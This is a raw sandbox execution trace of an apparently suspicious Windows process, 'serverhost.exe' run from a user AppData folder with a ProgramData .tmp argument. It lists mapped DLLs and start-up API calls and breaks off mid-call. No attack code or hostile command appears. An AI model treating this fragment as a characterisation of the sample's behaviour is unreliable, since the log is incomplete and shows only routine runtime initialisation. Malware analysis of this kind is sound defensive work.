id = 2029 start_va = 0x590000 end_va = 0x591fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2030 start_va = 0x2460000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 2031 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2032 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2033 start_va = 0x2560000 end_va = 0x2d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002560000" filename = "" Region: id = 2034 start_va = 0x2d60000 end_va = 0x2e60fff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2035 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2036 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2037 start_va = 0x63b30000 end_va = 0x63cbdfff entry_point = 0x63b31328 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 2038 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2039 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 2040 start_va = 0x2d60000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 2041 start_va = 0x6f320000 end_va = 0x6f342fff entry_point = 0x6f320000 region_type = mapped_file name = "contab32.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\CONTAB32.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\contab32.dll") Region: id = 2042 start_va = 0x5c0000 end_va = 0x5c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2043 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2044 start_va = 0x6c200000 end_va = 0x6c2b9fff entry_point = 0x6c26253f region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 2045 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x741811e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2046 start_va = 0x753b0000 end_va = 0x753d8fff entry_point = 0x753b6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2047 start_va = 0x2ea0000 end_va = 0x2f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2048 start_va = 0x3140000 end_va = 0x323ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 2049 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2050 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2051 start_va = 0x716f0000 end_va = 0x71772fff entry_point = 0x717013b0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 2052 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2053 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2054 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2055 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2056 start_va = 0x2fa0000 end_va = 0x309ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 2057 start_va = 0x5e0000 end_va = 0x5e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 2058 start_va = 0x5f0000 end_va = 0x5f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 2059 start_va = 0x3240000 end_va = 0x3632fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003240000" filename = "" Region: id = 2060 start_va = 0x754f0000 end_va = 0x7551cfff entry_point = 0x754f296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2061 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2062 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2063 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2064 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2065 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2066 start_va = 0x36890000 end_va = 0x3689ffff entry_point = 0x0 region_type = private name = "private_0x0000000036890000" filename = "" Region: id = 2067 start_va = 0x6bdc0000 end_va = 0x6c130fff entry_point = 0x6bdc0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 2068 start_va = 0x3640000 end_va = 0x378ffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 2069 start_va = 0x63cc0000 end_va = 0x63d74fff entry_point = 0x63d09935 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 2070 start_va = 0x6f0000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2071 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2072 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2073 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2074 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2075 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2076 start_va = 0x75300000 end_va = 0x75307fff entry_point = 0x753010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2077 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2078 start_va = 0x21c0000 end_va = 0x226ffff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2079 start_va = 0x6f500000 end_va = 0x6f516fff entry_point = 0x6f501549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 2080 start_va = 0x6f500000 end_va = 0x6f516fff entry_point = 0x6f501549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 2081 start_va = 0x6f4f0000 end_va = 0x6f4f7fff entry_point = 0x6f4f3c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 2082 start_va = 0x9e0000 end_va = 0x9e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 2083 start_va = 0x3790000 end_va = 0x3f8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003790000" filename = "" Region: id = 2084 start_va = 0x64110000 end_va = 0x68dfafff entry_point = 0x64110000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 2085 start_va = 0x63b00000 end_va = 0x63b2cfff entry_point = 0x63b162dc region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 2086 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 2087 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2088 start_va = 0xa00000 end_va = 0xa00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2096 start_va = 0x6d080000 end_va = 0x6d217fff entry_point = 0x6d080000 region_type = mapped_file name = "mspst32.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\MSPST32.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\mspst32.dll") Region: id = 2105 start_va = 0x3640000 end_va = 0x373ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003640000" filename = "" Region: id = 2106 start_va = 0x3780000 end_va = 0x378ffff entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2107 start_va = 0x5290000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 2108 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 2110 start_va = 0x74740000 end_va = 0x74764fff entry_point = 0x74742b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2111 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2112 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2113 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2116 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b3089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 2117 start_va = 0x729b0000 end_va = 0x729ebfff entry_point = 0x729b3089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 2118 start_va = 0x570000 end_va = 0x570fff entry_point = 0x570000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2119 start_va = 0x570000 end_va = 0x570fff entry_point = 0x570000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 2120 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2121 start_va = 0x6eaf0000 end_va = 0x6eb4afff entry_point = 0x6eaf0000 region_type = mapped_file name = "msadox.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll") Region: id = 2122 start_va = 0x6d1c0000 end_va = 0x6d21afff entry_point = 0x6d2066ea region_type = mapped_file name = "msadox.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msadox.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadox.dll") Region: id = 2123 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Thread: id = 88 os_tid = 0xc5c [0085.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa08 | out: lpSystemTimeAsFileTime=0x16fa08*(dwLowDateTime=0x5dce5f70, dwHighDateTime=0x1d34346)) [0085.471] GetCurrentThreadId () returned 0xc5c [0085.471] GetCurrentProcessId () returned 0xc58 [0085.471] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa00 | out: lpPerformanceCount=0x16fa00*=448404547) returned 1 [0085.471] GetStartupInfoW (in: lpStartupInfo=0x16f998 | out: lpStartupInfo=0x16f998*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0085.471] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76590000 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="FlsFree") returned 0x765e1f61 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="FlsGetValue") returned 0x765e1e16 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CreateEventExW") returned 0x765924d8 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CreateSemaphoreExW") returned 0x765c2111 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadStackGuarantee") returned 0x765d2510 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CreateThreadpoolTimer") returned 0x765cb009 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadpoolTimer") returned 0x772c89be [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x772bc02a [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CloseThreadpoolTimer") returned 0x772bc0d2 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CreateThreadpoolWait") returned 0x765c3f78 [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadpoolWait") returned 0x772c8bfb [0085.471] GetProcAddress (hModule=0x76590000, lpProcName="CloseThreadpoolWait") returned 0x772bb567 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="FlushProcessWriteBuffers") returned 0x772e5998 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x772b2251 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetCurrentProcessorNumber") returned 0x772b28f6 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetLogicalProcessorInformation") returned 0x765c2004 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="CreateSymbolicLinkW") returned 0x76619aa9 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="EnumSystemLocalesEx") returned 0x7661f3cf [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="CompareStringEx") returned 0x765eebc6 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetDateFormatEx") returned 0x7662f29f [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetLocaleInfoEx") returned 0x765c53a5 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetTimeFormatEx") returned 0x7662f21a [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetUserDefaultLocaleName") returned 0x7661f70b [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="IsValidLocaleName") returned 0x7661f71b [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="LCMapStringEx") returned 0x7661f72b [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetCurrentPackageId") returned 0x0 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetTickCount64") returned 0x765ceb4e [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0085.472] GetProcAddress (hModule=0x76590000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0085.473] GetCurrentThreadId () returned 0xc5c [0085.473] GetStartupInfoW (in: lpStartupInfo=0x16f968 | out: lpStartupInfo=0x16f968*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4075c2, hStdOutput=0x46a703ad, hStdError=0x0)) [0085.473] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0085.473] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.473] GetCommandLineA () returned="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" \"C:\\ProgramData\\C572.tmp\"" [0085.473] GetEnvironmentStringsW () returned 0x30edf8* [0085.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1120, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1120 [0085.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1120, lpMultiByteStr=0x30f6c0, cbMultiByte=1120, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1120 [0085.474] FreeEnvironmentStringsW (penv=0x30edf8) returned 1 [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] GetACP () returned 0x4e4 [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.474] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f96c | out: lpCPInfo=0x16f96c) returned 1 [0085.474] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f434 | out: lpCPInfo=0x16f434) returned 1 [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x16f1b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.474] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x16f448 | out: lpCharType=0x16f448) returned 1 [0085.474] GetLastError () returned 0x7f [0085.474] SetLastError (dwErrCode=0x7f) [0085.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.474] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f848, cbMultiByte=256, lpWideCharStr=0x16f188, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.474] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.475] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ef78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0085.475] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x16f748, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 